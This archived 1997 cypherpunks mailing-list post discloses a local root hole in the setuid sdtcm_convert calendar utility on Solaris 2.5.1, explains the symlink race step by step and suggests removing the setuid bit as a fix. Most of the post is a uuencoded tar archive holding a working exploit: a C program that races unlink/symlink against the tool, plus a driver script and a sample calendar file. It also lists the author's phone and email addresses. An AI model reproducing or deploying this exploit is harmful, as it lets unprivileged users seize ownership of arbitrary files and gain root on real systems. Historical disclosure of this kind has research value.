From: Cristian SCHIPOR <skipo@sundy.cs.pub.ro>
To: cypherpunks@toad.com
Message Hash: 903a3e49ae0ea3e3a9745b1663ebaa415f3c4876c9460b219dfabf71b3e705c0
Message ID: <Pine.GSO.3.95.970222170729.18883B-100000@sundy.cs.pub.ro>
Reply To: N/A
UTC Datetime: 1997-02-22 15:14:42 UTC
Raw Date: Sat, 22 Feb 1997 07:14:42 -0800 (PST)
From: Cristian SCHIPOR <skipo@sundy.cs.pub.ro>
Date: Sat, 22 Feb 1997 07:14:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
Message-ID: <Pine.GSO.3.95.970222170729.18883B-100000@sundy.cs.pub.ro>
MIME-Version: 1.0
Content-Type: text/plain
Sat Feb 22 15:25:48 EET 1997 Romania
Another hole in Solaris
I have found a security hole in sdtcm_convert on Solaris 2.5.1.
sdtcm_convert - calendar data conversion utility - allows any user to
change the owner for any file (or directory) from the system or gain root
access. The exploit is very simple. Change the permision mode of your calendar
file (callog.YOU) from /var/spool/calendar directory (usual r--rw----) and run
sdtcm_convert. sdtcm_convert 'll observe the change and 'll want to
correct it (it 'll ask you first). You have only to delete the callog file
and make a symbolic link to a target file and your calendar file and said to
sdtcm_convert 'y' (yes). sdtcm_convert 'll make you the owner of target
file ...
A simple way to correct this is to get out suid_exec bit from
sdtcm_convert
I made an exploit, so you have to extract the text, uudecode it, and exec
a 'tar -xf exploit.tar'. You'll get the files in exploit_dir.
Cristian Schipor - Computer Science Faculty - Bucharest - Romania
Email: skipo@math.pub.ro skipo@sundy.cs.pub.ro skipo@ns.ima.ro
Phone: (401) 410.60.88
begin 600 exploit.tar
M97AP;&]I=%]D:7(O4D5!1$U%
M
M # Q,# V,# ,# P,#0V, P,# P-#4W # P,# P,# Q,#(Q
M # V,S S-3<Q,3<W # P,30U-#( ,
M
M !U<W1A<@ P,'-K:7!O
M <W1U9#,
M P,# P,#0P # P,# R,#<
M
M
M
M J2&]W('1O(&UA:V4@82!S:6UP;&4@8V%L;&]G
M(&9I;&4J"@I)9B!Y;W4@9&]N="!H879E(&$@+W9A<B]S<&]O;"]C86QE;F1A
M<B]C86QL;V<N64]5(&5D:70@8V%L;&]G+F5X86UP;&4L"G)E<&QA8V4@)W-K
M:7!O)R!W:71H('EO=7(@=7-E<B!N86UE(&%N9" G<W5N9'DN8W,N<'5B+G)O
M)R!W:71H('EO=7(*;6%C:&EN92!N86UE("AT<GD@9FER<W0@=&AE('-H;W)T
M(&YA;64L(&5X86UP;&4Z('-U;F1Y(&%N9"!I9B!Y;W4G;&P@:&%V90IT<F]U
M8FQE<VAO=&EN9W,@=')Y('1H92!L;VYG(&YA;64L(&5X86UP;&4@<W5N9'DN
M8W,N<'5B+G)O*2X@069T97(@=&AA= IC;W!Y('1H92!N97<@8V%L;&]G(&9I
M;&4@:6X@+W9A<B]S<&]O;"]C86QE;F1A<B]C86QL;V<N64]54E]54T527TY!
M344L(')U;@IO;F-E('-D=&-M7V-O;G9E<G0@=VET:"!Y;W5R('5S97(@;F%M
M92 H97AA;7!L92!S9'1C;5]C;VYV97)T('-K:7!O*0IA;F0@=V%I="!F;W(@
M8V]R<F5C=&EO;G,N($YO=R!Y;W4@87)E(')E861Y('1O(')U;B!T:&4@97AP
M;&]I="X*
M
M
M
M
M
M
M
M
M
M
M 97AP;&]I=%]D:7(O8V%L;&]G+F5X86UP;&4
M
M # Q,# W,# ,# P,#0V, P,# P-#4W # P,# P
M,# Q,S(P # V,S S-38W-#0T # P,38U,#4 ,
M
M !U<W1A<@ P
M,'-K:7!O <W1U9#,
M P,# P,#0P # P,# R,#<
M
M
M
M !697)S:6]N.B T"BHJ*BH@<W1A<G0@
M;V8@;&]G(&]N($9R:2!$96,@(#8@,30Z,#<Z-#,@,3DY-B J*BHJ"@HH8V%L
M96YD87)A='1R:6)U=&5S("@B+2\O6$%024$O0U-!+T-!3$%45%(O+TY/3E-'
M34P@06-C97-S($QI<W0O+T5.(BPB,3 Z86-C97-S7VQI<W0B+")W;W)L9#HR
M(BD**"(M+R]805!)02]#4T$O0T%,05144B\O3D].4T=-3"!#86QE;F1A<B!.
M86UE+R]%3B(L(C4Z<W1R:6YG(BPB<VMI<&] <W5N9'DN8W,N<'5B+G)O(BD*
M*"(M+R]805!)02]#4T$O0T%,05144B\O3D].4T=-3"!#86QE;F1A<B!/=VYE
M<B\O14XB+"(V.G5S97(B+")S:VEP;T!S=6YD>2YC<RYP=6(N<F\B*0HH(BTO
M+UA!4$E!+T-302]#04Q!5%12+R].3TY31TU,($-H87)A8W1E<B!3970O+T5.
M(BPB-3IS=')I;F<B+")#+DE33RTX.#4Y+3$B*0HH(BTO+UA!4$E!+T-302]#
M04Q!5%12+R].3TY31TU,($1A=&4@0W)E871E9"\O14XB+"(W.F1A=&5?=&EM
M92(L(C$Y.38Q,C V5#$R,#<T,UHB*0HH(BTO+UA!4$E!+T-302]#04Q!5%12
M+R].3TY31TU,(%!R;V1U8W0@261E;G1I9FEE<B\O14XB+"(U.G-T<FEN9R(L
M(BTO+T14+R].3TY31TU,($-A;&5N9&%R(%!R;V1U8W0@5F5R<VEO;B Q+R]%
M3B(I"B@B+2\O6$%024$O0U-!+T-!3$%45%(O+TY/3E-'34P@5F5R<VEO;B\O
M14XB+"(U.G-T<FEN9R(L(BTO+UA!4$E!+T-302]615)324].,2].3TY31TU,
M($-302!697)S:6]N(#$O+T5.(BD**0H
M
M
M
M
M
M
M 97AP;&]I=%]D:7(O;W)A;F=E+F,
M
M # Q,# V,# ,# P,#0V, P,# P-#4W
M # P,# P,# Q,C0V # V,S S-38W,S(R # P,34S,#< ,
M
M !U
M<W1A<@ P,'-K:7!O <W1U9#,
M P,# P,#0P # P,# R,#<
M
M
M
M C:6YC;'5D92 \<W1D:6\N
M:#X*(VEN8VQU9&4@/'-Y<R]T>7!E<RYH/@HC:6YC;'5D92 \<WES+W-T870N
M:#X*(VEN8VQU9&4@/'5N:7-T9"YH/@H*(V1E9FEN92!P871H(" B+W9A<B]S
M<&]O;"]C86QE;F1A<B]C86QL;V<N(@H*"G9O:60@;6%I;BAI;G0@87)G8RP@
M8VAA<B J87)G=EM=*0I["FEN="!P:60L9FEL961E<ULR73L*1DE,12 J9CL*
M<W1R=6-T('-T870@:6YF;SL*;&]N9R!I.PIC:&%R('1A<F=E=%LQ,CA=+'-H
M:69T6S$R.%T["@D*"7-T<F-P>2AT87)G970L87)G=ELQ72D["@ES=')C<'DH
M<VAI9G0L<&%T:"D["@ES=')C870H<VAI9G0L87)G=ELR72D["@EI9BAP:7!E
M*&9I;&5D97,I*0H)>PH)"7!E<G)O<B@B8V%N="!C<F%T92!P:7!E7&XB*3L*
M"0EE>&ET*# I.PH)?0D*"6EF*'!I9#UF;W)K*"D]/3 I"@E["@D)9F]R*&D]
M,#MI/#,P,# P,# P.VDK*RD["@D)=6YL:6YK*'-H:69T*3L*"0ES>6UL:6YK
M*'1A<F=E="QS:&EF="D["@D)=W)I=&4H9FEL961E<ULQ72PB>5QN(BQS:7IE
M;V8H(GE<;B(I*3L*"7T)"0D)"@EE;'-E( H)>PH)"6-L;W-E*# I.PH)"61U
M<"AF:6QE9&5S6S!=*3L*"0ES>7-T96TH(FQE;6]N(BD["@D)<W1A="AT87)G
M970L)FEN9F\I.PH)"6EF*&EN9F\N<W1?=6ED/3UG971U:60H*2D@<')I;G1F
M*")#3TQ,($D@9&ED($E4("$A(5QN(BD["@E]"@D*?0H
M
M
M
M
M
M
M
M 97AP;&]I=%]D:7(O=&AE9FER<W0
M
M # Q,# W,# ,# P,#0V, P
M,# P-#4W # P,# P,# P-S0W # V,S S-38W,S,R # P,34T-3( ,
M
M
M !U<W1A<@ P,'-K:7!O
M<W1U9#, P,# P,#0P # P,# R
M,#<
M
M
M O8FEN+V5C:&\@
M(F]R86YG92YC("T^(&]R86YG92(*9V-C("UO(&]R86YG92!O<F%N9V4N8PH*
M+W5S<B]U8V(O=VAO86UI(#X@=V@*<F5A9"!54T52(#P@+B]W: H*(W=A=&-H
M:6YG(&9O<B!C86QL;V<@9FEL92!I9B!I="!I<VYT('=I;&P@<W1O< II9B A
M('1E<W0@+68@+W9A<B]S<&]O;"]C86QE;F1A<B]C86QL;V<N)%5315([('1H
M96X*(" O8FEN+V5C:&\@(DD@8V%N="!F;W5N9"!C86QL;V<@9FEL92X@4&QE
M87-E(')E860@4D5!1$U%(&%N9"!C<F5A=&4@:70B"B @97AI=#L*9FD*"B]B
M:6XO96-H;R B=VAA="=S('1H92!T87)G970@/S\_(@IR96%D(%1!4D=%5 H*
M+V)I;B]E8VAO("]B:6XO8VAM;V0@,# P("]V87(O<W!O;VPO8V%L96YD87(O
M8V%L;&]G+B154T52(#YL96UO;@HO8FEN+V5C:&\@+W5S<B]D="]B:6XO<V1T
M8VU?8V]N=F5R=" D55-%4B ^/FQE;6]N"B]B:6XO8VAM;V0@-S P("XO;&5M
M;VX*"BXO;W)A;F=E("1405)'150@)%5315(*
M
M
M
M
M
M
M
M
M
M
M
M
M
M
M
M
M
M
M
M
M
M
I
end
Return to February 1997
Return to “mpd@netcom.com (Mike Duvos)”